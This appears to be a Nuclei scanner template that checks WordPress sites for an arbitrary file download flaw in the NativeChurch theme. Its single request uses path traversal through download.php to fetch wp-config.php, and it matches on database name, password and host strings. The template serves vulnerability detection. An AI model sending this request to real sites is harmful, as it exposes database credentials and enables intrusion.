id: nativechurch-wp-theme-lfd

info:
  name: WordPress NativeChurch Theme - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system.
  reference:
    - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
  tags: wordpress,wp-theme,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_HOST"
          - "The base configurations of the WordPress"
        part: body
        condition: and
